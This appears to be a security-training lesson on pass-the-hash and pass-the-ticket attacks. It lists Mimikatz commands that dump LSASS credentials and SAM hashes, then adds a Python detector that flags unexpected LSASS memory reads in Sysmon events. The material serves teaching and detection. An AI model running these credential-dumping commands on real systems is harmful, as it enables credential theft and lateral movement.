Cyber Security Academy · Lesson

Pass-the-Hash and Pass-the-Ticket Attacks

Use credential hashes and Kerberos tickets to move laterally without knowing plaintext passwords.

Why These Attacks Exist

Windows authentication protocols keep authentication secrets (NTLM hashes, Kerberos tickets) in memory. An attacker with SYSTEM privileges can extract these secrets and reuse them to authenticate as other users without knowing their passwords.

Extracting NTLM Hashes with Mimikatz

Mimikatz is the premier credential extraction tool on Windows. Running as SYSTEM/Administrator, it reads the memory of the LSASS (Local Security Authority Subsystem Service) process to extract NTLM hashes and cleartext credentials.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam
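
Because the credential dump described above depends on reading LSASS process memory, defenders can watch for that access. The following is an added detection example, not part of the original lesson: it filters Sysmon Event ID 10 (ProcessAccess) records for non-allowlisted processes that open lsass.exe with memory-read rights. The sample events, the allowlisted EDR path and the function name are constructed for illustration.

```python
# Added example (not from the lesson): flag Sysmon Event ID 10 (ProcessAccess)
# records in which a non-allowlisted process opens lsass.exe with read rights.
LSASS = r"c:\windows\system32\lsass.exe"
PROCESS_VM_READ = 0x0010  # access right required to read another process's memory

# Assumption: tools expected to read LSASS at this site (hypothetical path).
ALLOWED_SOURCES = {r"c:\program files\example-edr\sensor.exe"}

# Constructed sample events; field names follow Sysmon's ProcessAccess schema.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\alice\Downloads\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Example-EDR\sensor.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Temp\dump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe"},
]


def suspicious_lsass_reads(events, allowed=ALLOWED_SOURCES):
    """Return (SourceImage, GrantedAccess) for unexpected LSASS memory reads."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 10:
            continue  # only ProcessAccess events are relevant
        if ev.get("TargetImage", "").lower() != LSASS:
            continue  # exact path match, so a look-alike lsass.exe elsewhere is ignored
        try:
            access = int(ev.get("GrantedAccess", "0"), 16)
        except ValueError:
            continue  # malformed mask: skip rather than crash the pipeline
        if not access & PROCESS_VM_READ:
            continue  # handle cannot read memory (e.g. query-limited only)
        if ev.get("SourceImage", "").lower() in allowed:
            continue  # expected reader, per the site allowlist
        hits.append((ev["SourceImage"], hex(access)))
    return hits


if __name__ == "__main__":
    for source, access in suspicious_lsass_reads(SAMPLE_EVENTS):
        print(f"ALERT lsass read: {source} GrantedAccess={access}")
```

The check tests the read bit rather than matching one exact mask, so a full-access handle is caught as well as a minimal one.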
